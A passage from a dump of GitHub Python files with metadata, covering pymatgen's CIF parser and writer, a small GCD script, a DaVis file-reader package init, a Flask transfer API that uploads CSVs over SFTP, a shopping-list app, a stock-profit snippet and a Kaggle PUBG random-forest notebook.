False\n\n for i in range(len(data[\"_atom_site_label\"])):\n try:\n # If site type symbol exists, use it. Otherwise, we use the\n # label.\n symbol = parse_symbol(data[\"_atom_site_type_symbol\"][i])\n except KeyError:\n symbol = parse_symbol(data[\"_atom_site_label\"][i])\n if not symbol:\n continue\n\n if oxi_states is not None:\n o_s = oxi_states.get(symbol, 0)\n # use _atom_site_type_symbol if possible for oxidation state\n if \"_atom_site_type_symbol\" in data.data.keys():\n oxi_symbol = data[\"_atom_site_type_symbol\"][i]\n o_s = oxi_states.get(oxi_symbol, o_s)\n try:\n el = Specie(symbol, o_s)\n except:\n el = DummySpecie(symbol, o_s)\n else:\n el = get_el_sp(symbol)\n\n x = str2float(data[\"_atom_site_fract_x\"][i])\n y = str2float(data[\"_atom_site_fract_y\"][i])\n z = str2float(data[\"_atom_site_fract_z\"][i])\n magmom = magmoms.get(data[\"_atom_site_label\"][i], Magmom(0))\n\n try:\n occu = str2float(data[\"_atom_site_occupancy\"][i])\n except (KeyError, ValueError):\n occu = 1\n\n if occu > 0:\n coord = (x, y, z)\n match = get_matching_coord(coord)\n if not match:\n coord_to_species[coord] = Composition({el: occu})\n coord_to_magmoms[coord] = magmom\n else:\n coord_to_species[match] += {el: occu}\n coord_to_magmoms[match] = None # disordered magnetic not currently supported\n\n sum_occu = [sum(c.values()) for c in coord_to_species.values()]\n if any([o > 1 for o in sum_occu]):\n warnings.warn(\"Some occupancies (%s) sum to > 1! 
If they are within \"\n \"the tolerance, they will be rescaled.\" % str(sum_occu))\n\n allspecies = []\n allcoords = []\n allmagmoms = []\n\n # check to see if magCIF file is disordered\n if self.feature_flags[\"magcif\"]:\n for k, v in coord_to_magmoms.items():\n if v is None:\n # Proposed solution to this is to instead store magnetic moments\n # as Specie 'spin' property, instead of site property, but this\n # introduces ambiguities for end user (such as unintended use of\n # `spin` and Specie will have fictious oxidation state).\n raise NotImplementedError('Disordered magnetic structures not currently supported.')\n\n if coord_to_species.items():\n for species, group in groupby(\n sorted(list(coord_to_species.items()), key=lambda x: x[1]),\n key=lambda x: x[1]):\n tmp_coords = [site[0] for site in group]\n tmp_magmom = [coord_to_magmoms[tmp_coord] for tmp_coord in tmp_coords]\n\n if self.feature_flags[\"magcif\"]:\n coords, magmoms = self._unique_coords(tmp_coords, tmp_magmom)\n else:\n coords, magmoms = self._unique_coords(tmp_coords)\n\n allcoords.extend(coords)\n allspecies.extend(len(coords) * [species])\n allmagmoms.extend(magmoms)\n\n # rescale occupancies if necessary\n for i, species in enumerate(allspecies):\n totaloccu = sum(species.values())\n if 1 < totaloccu <= self._occupancy_tolerance:\n allspecies[i] = species / totaloccu\n\n if allspecies and len(allspecies) == len(allcoords) and len(allspecies) == len(allmagmoms):\n\n if self.feature_flags[\"magcif\"]:\n struct = Structure(lattice, allspecies, allcoords,\n site_properties={\"magmom\": allmagmoms})\n else:\n struct = Structure(lattice, allspecies, allcoords)\n\n struct = struct.get_sorted_structure()\n\n if primitive:\n struct = struct.get_primitive_structure()\n struct = struct.get_reduced_structure()\n return struct\n\n def get_structures(self, primitive=True):\n \"\"\"\n Return list of structures in CIF file. 
primitive boolean sets whether a\n conventional cell structure or primitive cell structure is returned.\n\n Args:\n primitive (bool): Set to False to return conventional unit cells.\n Defaults to True.\n\n Returns:\n List of Structures.\n \"\"\"\n structures = []\n for d in self._cif.data.values():\n try:\n s = self._get_structure(d, primitive)\n if s:\n structures.append(s)\n except (KeyError, ValueError) as exc:\n # Warn the user (Errors should never pass silently)\n # A user reported a problem with cif files produced by Avogadro\n # in which the atomic coordinates are in Cartesian coords.\n warnings.warn(str(exc))\n if len(structures) == 0:\n raise ValueError(\"Invalid cif file with no structures!\")\n return structures\n\n def get_bibtex_strings(self):\n \"\"\"\n (Beta) Get BibTeX reference from CIF file.\n :param data:\n :return: BibTeX string\n \"\"\"\n\n # TODO: CIF specification supports multiple citations.\n\n bibtex_strs = []\n\n for d in self._cif.data.values():\n\n bibtex_entry = {'authors': '_citation_author_name',\n 'title': '_citation_title',\n 'journal': '_citation_journal_abbrev',\n 'volume': '_citation_journal_volume',\n 'year': '_citation_year',\n 'number': '_citation_number',\n 'page_first': '_citation_page_first',\n 'page_last': '_citation_page_last',\n 'doi': '_citation_DOI'}\n\n for field, tag in bibtex_entry.items():\n try:\n bibtex_entry[field] = d[tag]\n except:\n bibtex_entry[field] = \"?\"\n\n bibtex_entry['key'] = bibtex_entry['authors'][0].split(',')[0]+\":\"+bibtex_entry['year']\n bibtex_entry['key'] = ''.join(bibtex_entry['key'].split())\n bibtex_entry['authors'] = \" and \".join(bibtex_entry['authors'])\n bibtex_entry['pages'] = \"{0}--{1}\".format(bibtex_entry['page_first'], bibtex_entry['page_last'])\n\n for field, entry in bibtex_entry.items():\n if field is not 'key':\n bibtex_entry[field] = \"{\"+entry+\"}\"\n\n bibtex_str = (\"\"\"{key},\n author = {authors},\n title = {title},\n journal = {journal},\n year = {year},\n volume = {volume},\n number = {number},\n pages = {pages},\n doi = {doi}\"\"\".format(**bibtex_entry))\n bibtex_strs.append(\"@article{\"+bibtex_str+\"\\n}\")\n\n return bibtex_strs\n\n def as_dict(self):\n d = OrderedDict()\n for k, v in self._cif.data.items():\n d[k] = {}\n for k2, v2 in v.data.items():\n d[k][k2] = v2\n return d\n\n\nclass CifWriter(object):\n\n def __init__(self, struct, symprec=None, write_magmoms=False):\n \"\"\"\n A wrapper around CifFile to write CIF files from pymatgen structures.\n\n Args:\n struct (Structure): structure to write\n symprec (float): If not none, finds the symmetry of the structure\n and writes the cif with symmetry information. Passes symprec\n to the SpacegroupAnalyzer\n write_magmoms (bool): If True, will write magCIF file. Incompatible\n with symprec\n \"\"\"\n\n if write_magmoms and symprec:\n warnings.warn(\"Magnetic symmetry cannot currently be detected by pymatgen.\")\n symprec = None\n\n format_str = \"{:.8f}\"\n\n block = OrderedDict()\n loops = []\n spacegroup = (\"P 1\", 1)\n if symprec is not None:\n sf = SpacegroupAnalyzer(struct, symprec)\n spacegroup = (sf.get_space_group_symbol(),\n sf.get_space_group_number())\n # Needs the refined struture when using symprec. 
This converts\n # primitive to conventional structures, the standard for CIF.\n struct = sf.get_refined_structure()\n\n latt = struct.lattice\n comp = struct.composition\n no_oxi_comp = comp.element_composition\n block[\"_symmetry_space_group_name_H-M\"] = spacegroup[0]\n for cell_attr in ['a', 'b', 'c']:\n block[\"_cell_length_\" + cell_attr] = format_str.format(\n getattr(latt, cell_attr))\n for cell_attr in ['alpha', 'beta', 'gamma']:\n block[\"_cell_angle_\" + cell_attr] = format_str.format(\n getattr(latt, cell_attr))\n block[\"_symmetry_Int_Tables_number\"] = spacegroup[1]\n block[\"_chemical_formula_structural\"] = no_oxi_comp.reduced_formula\n block[\"_chemical_formula_sum\"] = no_oxi_comp.formula\n block[\"_cell_volume\"] = latt.volume.__str__()\n\n reduced_comp, fu = no_oxi_comp.get_reduced_composition_and_factor()\n block[\"_cell_formula_units_Z\"] = str(int(fu))\n\n if symprec is None:\n block[\"_symmetry_equiv_pos_site_id\"] = [\"1\"]\n block[\"_symmetry_equiv_pos_as_xyz\"] = [\"x, y, z\"]\n else:\n sf = SpacegroupAnalyzer(struct, symprec)\n\n symmops = []\n for op in sf.get_symmetry_operations():\n v = op.translation_vector\n symmops.append(SymmOp.from_rotation_and_translation(\n op.rotation_matrix, v))\n\n ops = [op.as_xyz_string() for op in symmops]\n block[\"_symmetry_equiv_pos_site_id\"] = \\\n [\"%d\" % i for i in range(1, len(ops) + 1)]\n block[\"_symmetry_equiv_pos_as_xyz\"] = ops\n\n loops.append([\"_symmetry_equiv_pos_site_id\",\n \"_symmetry_equiv_pos_as_xyz\"])\n\n contains_oxidation = True\n try:\n symbol_to_oxinum = OrderedDict([\n (el.__str__(),\n float(el.oxi_state))\n for el in sorted(comp.elements)])\n except AttributeError:\n symbol_to_oxinum = OrderedDict([(el.symbol, 0) for el in\n sorted(comp.elements)])\n contains_oxidation = False\n if contains_oxidation:\n block[\"_atom_type_symbol\"] = symbol_to_oxinum.keys()\n block[\"_atom_type_oxidation_number\"] = symbol_to_oxinum.values()\n loops.append([\"_atom_type_symbol\", \"_atom_type_oxidation_number\"])\n\n atom_site_type_symbol = []\n atom_site_symmetry_multiplicity = []\n atom_site_fract_x = []\n atom_site_fract_y = []\n atom_site_fract_z = []\n atom_site_label = []\n atom_site_occupancy = []\n atom_site_moment_label = []\n atom_site_moment_crystalaxis_x = []\n atom_site_moment_crystalaxis_y = []\n atom_site_moment_crystalaxis_z = []\n count = 1\n if symprec is None:\n for site in struct:\n for sp, occu in sorted(site.species_and_occu.items()):\n atom_site_type_symbol.append(sp.__str__())\n atom_site_symmetry_multiplicity.append(\"1\")\n atom_site_fract_x.append(\"{0:f}\".format(site.a))\n atom_site_fract_y.append(\"{0:f}\".format(site.b))\n atom_site_fract_z.append(\"{0:f}\".format(site.c))\n atom_site_label.append(\"{}{}\".format(sp.symbol, count))\n atom_site_occupancy.append(occu.__str__())\n\n magmom = site.properties.get('magmom', Magmom(0))\n moment = Magmom.get_moment_relative_to_crystal_axes(magmom, latt)\n if write_magmoms and abs(magmom) > 0:\n atom_site_moment_label.append(\"{}{}\".format(sp.symbol, count))\n atom_site_moment_crystalaxis_x.append(moment[0])\n atom_site_moment_crystalaxis_y.append(moment[1])\n atom_site_moment_crystalaxis_z.append(moment[2])\n\n count += 1\n else:\n # The following just presents a deterministic ordering.\n unique_sites = [\n (sorted(sites, key=lambda s: tuple([abs(x) for x in\n s.frac_coords]))[0],\n len(sites))\n for sites in sf.get_symmetrized_structure().equivalent_sites\n ]\n for site, mult in sorted(\n unique_sites,\n key=lambda t: 
(t[0].species_and_occu.average_electroneg,\n -t[1], t[0].a, t[0].b, t[0].c)):\n for sp, occu in site.species_and_occu.items():\n atom_site_type_symbol.append(sp.__str__())\n atom_site_symmetry_multiplicity.append(\"%d\" % mult)\n atom_site_fract_x.append(\"{0:f}\".format(site.a))\n atom_site_fract_y.append(\"{0:f}\".format(site.b))\n atom_site_fract_z.append(\"{0:f}\".format(site.c))\n atom_site_label.append(\"{}{}\".format(sp.symbol, count))\n atom_site_occupancy.append(occu.__str__())\n count += 1\n\n block[\"_atom_site_type_symbol\"] = atom_site_type_symbol\n block[\"_atom_site_label\"] = atom_site_label\n block[\"_atom_site_symmetry_multiplicity\"] = \\\n atom_site_symmetry_multiplicity\n block[\"_atom_site_fract_x\"] = atom_site_fract_x\n block[\"_atom_site_fract_y\"] = atom_site_fract_y\n block[\"_atom_site_fract_z\"] = atom_site_fract_z\n block[\"_atom_site_occupancy\"] = atom_site_occupancy\n loops.append([\"_atom_site_type_symbol\",\n \"_atom_site_label\",\n \"_atom_site_symmetry_multiplicity\",\n \"_atom_site_fract_x\",\n \"_atom_site_fract_y\",\n \"_atom_site_fract_z\",\n \"_atom_site_occupancy\"])\n if write_magmoms:\n block[\"_atom_site_moment_label\"] = atom_site_moment_label\n block[\"_atom_site_moment_crystalaxis_x\"] = atom_site_moment_crystalaxis_x\n block[\"_atom_site_moment_crystalaxis_y\"] = atom_site_moment_crystalaxis_y\n block[\"_atom_site_moment_crystalaxis_z\"] = atom_site_moment_crystalaxis_z\n loops.append([\"_atom_site_moment_label\",\n \"_atom_site_moment_crystalaxis_x\",\n \"_atom_site_moment_crystalaxis_y\",\n \"_atom_site_moment_crystalaxis_z\"])\n d = OrderedDict()\n d[comp.reduced_formula] = CifBlock(block, loops, comp.reduced_formula)\n self._cf = CifFile(d)\n\n def __str__(self):\n \"\"\"\n Returns the cif as a string.\n \"\"\"\n return self._cf.__str__()\n\n def write_file(self, filename):\n \"\"\"\n Write the cif file.\n \"\"\"\n with zopen(filename, \"wt\") as f:\n f.write(self.__str__())\n\n\ndef str2float(text):\n \"\"\"\n Remove uncertainty brackets from strings and return the float.\n \"\"\"\n\n try:\n return float(re.sub(r\"\\(.+\\)\", \"\", text))\n except TypeError:\n if isinstance(text, list) and len(text) == 1:\n return float(re.sub(r\"\\(.+\\)\", \"\", text[0]))\n except ValueError as ex:\n if text.strip() == \".\":\n return 0\n raise ex\n","repo_name":"comscope/ComDMFT","sub_path":"ComRISB/pyextern/pymatgen/pymatgen/io/cif.py","file_name":"cif.py","file_ext":"py","file_size_in_byte":50333,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"86"} +{"seq_id":"39930639313","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 1 17:00:37 2020\r\n\r\n@author: ansar\r\n\"\"\"\r\n\r\ndef gcd(m,n):\r\n fm=[]\r\n for i in range(1,m+1):\r\n if(m%i==0):\r\n fm.append(i)\r\n \r\n fn=[]\r\n for j in range(1,n+1):\r\n if(n%j==0):\r\n fn.append(j)\r\n \r\n fc=[]\r\n for c in fm:\r\n if c in fn:\r\n fc.append(c)\r\n \r\n return(fc[-1]) \r\n \r\nprint(gcd(14,63)) ","repo_name":"SameerAnsari1204/python","sub_path":"gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26616263841","text":"\"\"\"\nReadIM: A fast DaVis8 file reader and writer for Python\n=======================================================\n\nDocumentation is available in the docstrings.\n\nContents\n--------\nReadIM is a wrapper for for C-code provided by LaVision as the core\nfunctionality. 
Additional functions are provided to load array data into memory\nwith access to data as numpy arrays and attributes as dictionaires.\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nfrom . import extra\nfrom . import core\n# collect buffer fommats together\nBUFFER_FORMATS = {}\nfor s in dir(core):\n if s.find('BUFFER_FORMAT') == 0:\n BUFFER_FORMATS[getattr(core, s)] = s\n\n# collect error codes\nERROR_CODES = {}\nfor s in dir(core):\n if s.find('IMREAD_ERR') == 0:\n ERROR_CODES[getattr(core,s)] = s\n\ndel(s)\nfrom .core import (BufferType, BufferScaleType, AttributeList,\n CreateBuffer, DestroyBuffer, DestroyAttributeList,\n ReadIM7, WriteIM7, GetVectorComponents, SetBufferScale,\n SetAttribute)\n\nfrom .extra import *","repo_name":"paugier/readim","sub_path":"ReadIM/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17403449506","text":"import json\nimport datetime\nimport os\nfrom flask import request, session, escape\nfrom flask_jwt import jwt_required\nfrom flask_restful import Resource, reqparse\nfrom models.item import ItemModel, Sftp, test_write, recursive_ftp\nfrom models.user import UserModel\n\nclass Item(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument(\"transfer\",\n type=dict,\n required=True,\n help=\"There is a lack of information in the transfer!\"\n )\n\n\n parser.add_argument('type',\n type=str,\n required=True,\n help=\"This field cannot be left blank!\"\n )\n\n @jwt_required()\n def get(self):\n request_data = Item.parser.parse_args().get(\"transfer\", None)\n checkCode = request_data['checkCode']\n item = ItemModel.find_by_name(checkCode)\n\n if item:\n user = UserModel.find_by_id(1).json()\n print(user)\n username, password = user['username'], user['password']\n host, port = user['host'], user['port']\n\n connection = Sftp(username, password, host, port)\n\n if checkCode in str(recursive_ftp(connection.sftp())):\n item.status = 'Processing'\n item.save_to_db()\n return item.json()\n else:\n return {'message': 'Item not found'}, 404\n\n @jwt_required()\n def post(self):\n x = datetime.datetime.now()\n date = str(x.day) + '-' + x.strftime(\"%b\") + '-' + str(x.year)\n\n request_data = Item.parser.parse_args()\n data = Item.parser.parse_args().get('transfer', None)\n\n if ItemModel.find_by_name(data['checkCode']):\n return {'message': \"An item with checkCode:'{}' already exists.\".format(\n data['checkCode'])}, 400 # something when wrong with the request\n\n item = ItemModel(\n data['intermediateIBAN'],\n data['checkCode'],\n data['senderIBAN'],\n data['senderName'],\n data['receiverIBAN'],\n data['receiverName'],\n data['description'],\n data['amount'],\n data['currencyCode'],\n request_data['type'],\n \"Received\", # initial status\n ) # {'name': name, 'price': request_data['price']}\n\n try:\n item.save_to_db() # ItemModel.insert(item)\n try:\n item = ItemModel.find_by_name(data['checkCode'])\n print(f\"Item:{item.json()}\")\n\n user = UserModel.find_by_id(1).json()\n print(user)\n username, password = user['username'], user['password']\n host, port = user['host'], user['port']\n connection = Sftp(username, password, host, port)\n\n sftp = connection.sftp()\n\n try:\n test_write(sftp, \"PaySafe_transfer_\"+date+\"_\"+data['checkCode']+\".csv\", str(item.json()).replace(\"Received\", \"Sent\"))\n item.status = \"Sent\"\n item.save_to_db()\n except ValueError:\n return {\"message\": 
\"No able to connect to the SFTP. Try later.\"}, 500\n # else:\n # return {\"message\": \"The file doesn't exists.\"}, 500 # internal server error\n\n except ValueError:\n item = ItemModel.find_by_name(data['checkCode'])\n item.status = \"Stiff\"\n item.save_to_db()\n return {\"message\": \"An error occurred transferring the item to SFTP.\"}, 500 # internal server error\n except ValueError:\n return {\"message\": \"An error occurred inserting the item.\"}, 500 # internal server error\n\n return item.json(), 201\n\n @jwt_required()\n def delete(self):\n request_data = Item.parser.parse_args().get(\"transfer\", None)\n checkCode = request_data['checkCode']\n item = ItemModel.find_by_name(checkCode)\n\n if item:\n item.delete_from_db()\n\n return {'message': 'Item deleted.'}\n #\n # # @jwt_required()\n # def put(self, name):\n # # request_data = request.get_json()\n # request_data = Item.parser.parse_args()\n #\n # item = ItemModel.find_by_name(name)\n #\n # if item is None:\n # item = ItemModel(name, request_data['price'], request_data['store_id'])\n # else:\n # item.price = request_data['price']\n # item.store_id = request_data['store_id']\n # item.save_to_db()\n #\n # return item.json()\n\n\nclass ItemList(Resource):\n def get(self):\n # return {'items': list(map(lambda x: x.json(), ItemModel.query.all()))}\n return {'items': [item.json() for item in ItemModel.query.all()]}\n\n\n","repo_name":"MelinteB-UPR/Paysafe","sub_path":"resources/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70912126044","text":"\n\n\n## arr represents daily stock prices..\n\n## return the max profilt\n\n\ndef buy_sell_once(arr):\n m_p = 0\n prev = 0\n res = []\n for i in range(1,len(arr)):\n curr = max(prev+arr[i]-arr[i-1],arr[i]-arr[i-1])\n prev = curr\n m_p = max(curr,m_p)\n res.append(curr) ## res.append(max(0,curr)) will also work....\n return [0]+res\n\n\ndef buy_sell_twice(arr):\n x = buy_sell_once(arr)\n y = buy_sell_once([-i for i in reversed(arr)])\n print(x,y)\n res = [x[i]+y[i+1] if i \")\n\n try:\n shopping_list_items.remove(what_to_remove)\n except ValueError:\n pass\n\n show_items()\n\n\ndef add_item(new_item):\n show_items()\n\n if len(shopping_list_items):\n position = input(\"Where do you want to put {} \\n\"\n \"Press Enter to add it to the end of the list \\n\"\n \"> \".format(new_item)\n )\n else:\n position = 0\n\n try:\n position = abs(int(position))\n except ValueError:\n position = None\n if position is not None:\n shopping_list_items.insert(position-1, new_item)\n else:\n # add new items to our list\n shopping_list_items.append(new_item)\n\n\nshow_help()\n\nwhile True:\n\n # ask for new items\n new_item = input(\"> \")\n\n # how type DONE to quit the app\n if new_item.upper() == 'DONE' or new_item.upper() == 'QUIT':\n break\n elif new_item.upper() == 'HELP':\n show_help()\n continue\n elif new_item.upper() == 'SHOW':\n show_items()\n continue\n elif new_item.upper() == 'REMOVE':\n remove_from_list()\n elif new_item == \"\":\n print(\"Cannot add an empty item to the list, please enter a valid item\")\n continue\n else:\n # adds new items\n add_item(new_item)\n\n show_items()\n\n\n\n","repo_name":"danielmaia19/Python-Basics","sub_path":"Shopping_List_App3.py","file_name":"Shopping_List_App3.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} 
+{"seq_id":"74448077083","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n# numpy and pandas for data manipulation\nimport numpy as np\nimport pandas as pd \n\n# sklearn preprocessing for dealing with categorical variables\nfrom sklearn.preprocessing import LabelEncoder\n\n# File system manangement\nimport os\n\n# Suppress warnings \nimport warnings\nwarnings.filterwarnings('ignore')\n\n# matplotlib and seaborn for plotting\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# print out files\nprint(os.listdir(\"../input/\"))\n\n# training data\n\ntraindata = pd.read_csv('../input/train_V2.csv')\ntraindata.head()\n\n# testing data\n\ntestdata = pd.read_csv('../input/test_V2.csv')\ntestdata.head()\ndef missing_values_table(df):\n        # Total missing values\n        mis_val = df.isnull().sum()\n        \n        # Percentage of missing values\n        mis_val_percent = 100 * df.isnull().sum() / len(df)\n        \n        # Make a table with the results\n        mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\n        \n        # Rename the columns\n        mis_val_table_ren_columns = mis_val_table.rename(\n        columns = {0 : 'Missing Values', 1 : '% of Total Values'})\n        \n        # Sort the table by percentage of missing descending\n        mis_val_table_ren_columns = mis_val_table_ren_columns[\n            mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\n        '% of Total Values', ascending=False).round(1)\n        \n        # Print some summary information\n        print (\"Your selected dataframe has \" + str(df.shape[1]) + \" columns.\\n\"      \n            \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\n              \" columns that have missing values.\")\n        \n        # Return the dataframe with missing information\n        return mis_val_table_ren_columns\nmissing_values = missing_values_table(traindata)\nmissing_values\n\ntraindata[traindata['winPlacePerc'].isnull()]\ntraindata.drop(2744604, inplace= True)\ntraindata = pd.get_dummies(traindata, columns = ['matchType'])\nmatchType_encoding = traindata.filter(regex='matchType')\nmatchType_encoding.head()\n# Turn groupId and match Id into categorical types\ntraindata['groupId'] = traindata['groupId'].astype('category')\ntraindata['matchId'] = traindata['matchId'].astype('category')\n\n# Get category coding for groupId and matchID\ntraindata['groupId_cat'] = traindata['groupId'].cat.codes\ntraindata['matchId_cat'] = traindata['matchId'].cat.codes\n\n# Get rid of old columns\ntraindata.drop(columns=['groupId', 'matchId'], inplace=True)\n\n# Lets take a look at our newly created features\ntraindata[['groupId_cat', 'matchId_cat']].head()\ntraindata.drop(columns = ['Id'], inplace=True)\ntraindata['totalDistance'] = traindata['walkDistance'] + traindata['rideDistance'] + traindata['swimDistance']\ntraindata['headshotRate'] = traindata['headshotKills']/traindata['kills']\ntraindata['headshotRate'] = traindata['headshotRate'].fillna(0)\ntraindata['playersJoined'] = traindata.groupby('matchId_cat')['matchId_cat'].transform('count')\n\n# Create normalized features\ntraindata['killsNorm'] = traindata['kills']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['damageDealtNorm'] = traindata['damageDealt']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['maxPlaceNorm'] = traindata['maxPlace']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['matchDurationNorm'] = traindata['matchDuration']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['healsandboosts'] = traindata['heals'] + traindata['boosts']\ntraindata['killsWithoutMoving'] = ((traindata['kills'] > 0) & (traindata['totalDistance'] == 0))\n\n\n# Check players who kills without moving\ndisplay(traindata[traindata['killsWithoutMoving'] == True].shape)\ntraindata[traindata['killsWithoutMoving'] == True].head(10)\n# Remove outliers\ntraindata.drop(traindata[traindata['killsWithoutMoving'] == True].index, inplace=True)\n# Drop roadKill 'cheaters'\ntraindata.drop(traindata[traindata['roadKills'] > 10].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['kills'] > 30].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['longestKill'] >= 1000].index, inplace=True)\ntraindata.drop(traindata[traindata['walkDistance'] >= 10000].index, inplace=True)\ntraindata.drop(traindata[traindata['rideDistance'] >= 20000].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['swimDistance'] >= 2000].index, inplace=True)\ntraindata.drop(traindata[traindata['weaponsAcquired'] >= 80].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['heals'] >= 40].index, inplace=True) \nsample = 500000\ndf_sample = traindata.sample(sample)\n# Split sample into training data and target variable\ndf = df_sample.drop(columns = ['winPlacePerc']) #all columns except target\ny = df_sample['winPlacePerc'] # Only target variable\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.12, random_state=42)\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Function to print the MAE (Mean Absolute Error) score\n# This is the metric used by Kaggle in this competition\ndef print_score(m : RandomForestRegressor):\n    res = ['mae train: ', mean_absolute_error(m.predict(X_train), y_train), \n           'mae val: ', mean_absolute_error(m.predict(X_test), y_test)]\n    if hasattr(m, 'oob_score_'): res.append(m.oob_score_)\n    print(res)\nm1 = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features='sqrt',\n                          n_jobs=-1)\nm1.fit(X_train, y_train)\nprint_score(m1)\n# provides a way to analyze feature importance \n#takes in a model and a dataframe and pulls the importances and make them into a seperate table \ndef rf_feat_importance(m, df):\n    return pd.DataFrame({'cols':df.columns, 'imp':m.feature_importances_}\n                       ).sort_values('imp', ascending=False)\n\n\nfi = rf_feat_importance(m1, df); fi[:10]\nto_keep = fi[fi.imp>0.005].cols\nprint('Significant features: ', len(to_keep))\nto_keep\ndf_keep = df[to_keep].copy()\nX_train, X_test, y_train, y_test = train_test_split(df_keep, y, test_size=0.12, random_state=42)\n\nm2 = RandomForestRegressor(n_estimators=80, min_samples_leaf=3, max_features='sqrt',\n                          n_jobs=-1)\nm2.fit(X_train, y_train)\nprint_score(m2)\nfrom sklearn import metrics\nfrom scipy.cluster import hierarchy as hc\nfrom fastai.imports import *\n\ncorr = np.round(scipy.stats.spearmanr(df_keep).correlation, 4)\ncorr_condensed = hc.distance.squareform(1-corr)\nz = hc.linkage(corr_condensed, method='average')\nfig = plt.figure(figsize=(14,10))\ndendrogram = hc.dendrogram(z, labels=df_keep.columns, orientation='left', leaf_font_size=16)\nplt.plot()\n# Prepare data\nval_perc_full = 0.12 # % to use for validation set\nn_valid_full = int(val_perc_full * len(traindata)) \nn_trn_full = len(traindata)-n_valid_full\ndf_full = traindata.drop(columns = ['winPlacePerc']) # all columns except target\ny = traindata['winPlacePerc'] # target variable\ndf_full = df_full[to_keep] # Keep only relevant features\nX_train, X_test, y_train, y_test = train_test_split(df_full, y, test_size=0.12, random_state=42)\n\n# Check dimensions of data\nprint('Sample train shape: ', X_train.shape, \n      'Sample target shape: ', y_train.shape, \n      'Sample validation shape: ', X_test.shape)\nm3 = RandomForestRegressor(n_estimators=70, min_samples_leaf=3, max_features=0.5,\n                          n_jobs=-1)\nm3.fit(X_train, y_train)\nprint_score(m3)\n# Add engineered features to the testdata set\ntestdata['totalDistance'] = testdata['walkDistance'] + testdata['rideDistance'] + testdata['swimDistance']\ntestdata['headshotRate'] = testdata['headshotKills']/testdata['kills']\ntestdata['headshotRate'] = testdata['headshotRate'].fillna(0)\ntestdata['playersJoined'] = testdata.groupby('matchId')['matchId'].transform('count')\n\n# Create normalized features\ntestdata['killsNorm'] = testdata['kills']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['damageDealtNorm'] = testdata['damageDealt']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['maxPlaceNorm'] = testdata['maxPlace']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['matchDurationNorm'] = testdata['matchDuration']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['healsandboosts'] = testdata['heals'] + testdata['boosts']\n\ntestdata['killsWithoutMoving'] = ((testdata['kills'] > 0) & (testdata['totalDistance'] == 0))\n\n\n# Turn groupId and match Id into categorical types\ntestdata['groupId'] = testdata['groupId'].astype('category')\ntestdata['matchId'] = testdata['matchId'].astype('category')\n\n# Get category coding for groupId and matchID\ntestdata['groupId_cat'] = testdata['groupId'].cat.codes\ntestdata['matchId_cat'] = testdata['matchId'].cat.codes\n\n# Remove irrelevant features from the testdata set\ntest_pred = testdata[to_keep].copy()\n\n# Fill NaN with 0 (temporary)\ntest_pred.fillna(0, inplace=True)\ntest_pred.head()\n\n# Make submission ready for Kaggle\n# We use our final Random Forest model (m3) to get the predictions\npredictions = np.clip(a = m3.predict(test_pred), a_min = 0.0, a_max = 1.0)\npred_df = pd.DataFrame({'Id' : testdata['Id'], 'winPlacePerc' : predictions})\n\n# Create submission file\npred_df.to_csv(\"submission.csv\", index=False)","repo_name":"aorursy/new-nb-6","sub_path":"rgwegwegwe_first-submission.py","file_name":"rgwegwegwe_first-submission.py","file_ext":"py","file_size_in_byte":9834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
